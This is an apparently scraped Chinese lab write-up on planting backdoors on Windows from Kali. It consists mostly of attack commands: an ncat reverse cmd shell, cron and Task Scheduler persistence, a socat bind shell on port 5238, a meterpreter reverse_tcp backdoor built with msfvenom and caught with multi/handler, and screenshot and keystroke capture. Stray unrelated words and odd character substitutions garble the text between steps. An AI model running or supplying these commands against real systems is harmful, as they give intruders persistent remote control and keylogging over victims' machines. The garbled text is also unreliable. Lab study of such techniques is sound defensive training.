①在linux獲取windows 的shelllinux
在Windows中輸入指令ncat.exe -e cmd kali的IP 端口號來將本身的cmd傳給kali;
shell
②cron啓動windows
使用crontab -e
修改配置文件,將最後一行改成m h dom mon dow user command
,:wq!
保存並退出。
網絡
使用crontab -l
dom
這樣kali內每小時的第20分鐘自動運行指令,反彈至pc端的5238端口tcp
在windows系統中打開控制面板—管理工具-任務計劃程序-建立任務-填寫任務名稱後新建觸發器,以下圖所示。
工具
在操做-程序或腳本中選擇socat.exe
文件路徑,在添加參數中寫tcp-listen:5238 exec:cmd.exe,pty,stderr
,即將cmd.exe綁定到5238端口,同時將cmd.exe
的stderr
重定向到stdout上。以後能夠看到本身的任務,右鍵運行!
3d
在linux中輸入socat - tcp:IP:端口號
code
在kali中輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=虛擬機IP LPORT=端口號 -f exe >20145224.exe
生成後門程序:
blog
ncat傳輸後門文件
windows系統使用ncat.exe -lv 端口號 > 保存文件名
監聽準備接受文件;
kali系統使用ncat -nv 主機IP 端口號 < 文件名
來發送指定文件;
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主機IP
set LPORT 端口號
show options(檢查全部數據是否正確)
exploit
屏幕截圖
鍵盤抓取
解決方法:首先是添加的觸發器進程沒有運行...其次是端口可能被佔用,改了之後仍是不行,最後發現他的ip變了!!!!!!真的變了!以後成功了。